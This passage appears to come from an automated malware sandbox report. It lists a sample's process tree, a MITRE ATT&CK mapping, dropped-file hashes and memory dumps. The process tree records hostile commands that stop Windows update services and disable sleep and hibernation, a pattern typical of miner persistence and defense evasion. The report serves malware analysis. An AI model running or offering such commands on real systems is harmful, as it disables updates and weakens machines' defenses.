  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2348
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1676
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2360
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2132
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1524
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1632
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2368
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\湑兣坑㡶扗8

Filesize
4KB

MD5
a637e497303415d49fbccb5e0ff03e12

SHA1
0e11b6e090bc53d9c8f8fd8ce7df4792b77d353a

SHA256
5e52fdbc9f1a73348ba717cfc0be7c1c84bf46d3d373ffa61ed93506a25a1c7d

SHA512
438794dcf2addce1975f198f63e2ae26f4bc5541e40afe456d73a30b6e58d2b4f2206915259af18426ff09996127083e370982f995013765ee53e5a9192c9b2c

Download Submit
memory/2696-13-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/2696-12-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/2696-11-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/2772-53-0x000000001B410000-0x000000001B6F2000-memory.dmp

Filesize
2.9MB

Download
memory/2772-54-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/2828-28-0x00000001406EC000-0x00000001408BA000-memory.dmp

Filesize
1.8MB

Download
memory/2828-31-0x0000000077150000-0x0000000077152000-memory.dmp

Filesize
8KB

Download
memory/2828-29-0x0000000077150000-0x0000000077152000-memory.dmp

Filesize
8KB

Download
memory/2828-40-0x0000000140000000-0x0000000140A4A000-memory.dmp

Filesize
10.3MB

Download
memory/2828-33-0x0000000077150000-0x0000000077152000-memory.dmp

Filesize
8KB

Download
memory/2828-34-0x0000000140000000-0x0000000140A4A000-memory.dmp

Filesize
10.3MB

Download
memory/2828-35-0x0000000140000000-0x0000000140A4A000-memory.dmp

Filesize
10.3MB

Download
memory/2828-119-0x00000001406EC000-0x00000001408BA000-memory.dmp

Filesize
1.8MB

Download
memory/2828-128-0x0000000140000000-0x0000000140A4A000-memory.dmp

Filesize
10.3MB

Download
memory/2828-303-0x0000000140000000-0x0000000140A4A000-memory.dmp

Filesize
10.3MB

Download
memory/2828-302-0x00000001406EC000-0x00000001408BA000-memory.dmp

Filesize
1.8MB

Download